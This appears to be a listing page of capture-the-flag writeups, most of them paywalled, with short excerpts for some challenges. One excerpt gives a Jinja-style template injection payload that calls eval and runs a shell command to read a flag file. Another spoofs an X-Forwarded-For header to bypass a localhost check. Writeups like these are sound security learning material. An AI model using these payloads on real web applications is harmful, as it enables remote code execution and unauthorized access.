-
easy_mobile
这题是一个AndroidJNI逆向题,入口在MainActivity.java。Java层几乎没有逻辑,只是把输入框内容传给native函数checkflag(),所以重点在libnative-lib.so。先用MCP对libnative-lib.so做分析,定位到Java_com_example_rectf_MainActivity_checkflag。反编译后可以看出程序先检查输入长度必须是2...
- Reverse
- 3天前
-
0xGame 2020 jwt
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 6天前
-
post the get
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 7天前
-
beautiful壁纸-writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 9天前
-
关于game1的做题之新手避坑指南
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 11天前
-
Bugku_Outsiders
F12HackBarLoadURLAddHeaderx-forwarded-for:127.0.0.1Execute,得到Flag:Icangivetheflagtomyself,right?N0PS{XF0rw4Rd3D}
- WEB
- 17天前
-
Bugku_CaaS
Payloadname={{g.pop["global""s"].builtins.eval(request.form.team_name)}}&team_name=import("os").popen("catflag.txt").read()屏幕输出Haha!Nocertificateforn00bz{5571_57r1k3s_4g41n_7a1b3f4e5d}
- WEB
- 17天前
-
webshell流量分析
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- MISC
- 18天前
-
消失的Yui
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- MISC
- 20天前
-
hellogate
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 1月前
-
2022年羊城杯,题目名26
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1月前
-
web管理员系统
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
4 金币
- WEB
- 1月前
-
misc_这是一张单纯的图片
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 1月前
-
2025年CISCN,Crypto类,题目ECDSA
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 1月前
-
2020年UMDCTF,Crypto类,题Relatively Rough RSA
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 1月前
-
2020年UMDCTF,类Crypto题目Baby's First,WriteUp
#位移后,flag会出现#改好附件ciphertext.txt实际路径,在python3环境中执行就可以得到flag#最终执行结果是UMDCTF-{1_1uv_crypt0}#python代码如下:#!/usr/bin/envpython3#-*-coding:utf-8-*-withopen('d://ciphertext.txt','rb')asf:enc=f.read()#注意:enc[0]...
- Crypto
- 1月前
-
Rubik's Cube
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Reverse
- 1月前
-
如此接近
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Crypto
- 1月前
-
2023年贵阳大数据及网络安全精英对抗赛,题eezzrrssaa
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 1月前
-
一闪而过的 Flag
题目说的很明确了:一闪而过,我们打开也确实如此一个最为简单的办法就是瞬间截图:然后对着敲就好,注意别看错了。还可以脚本小子启动,但是对于这道题有点小题大做了
- MISC
- 1月前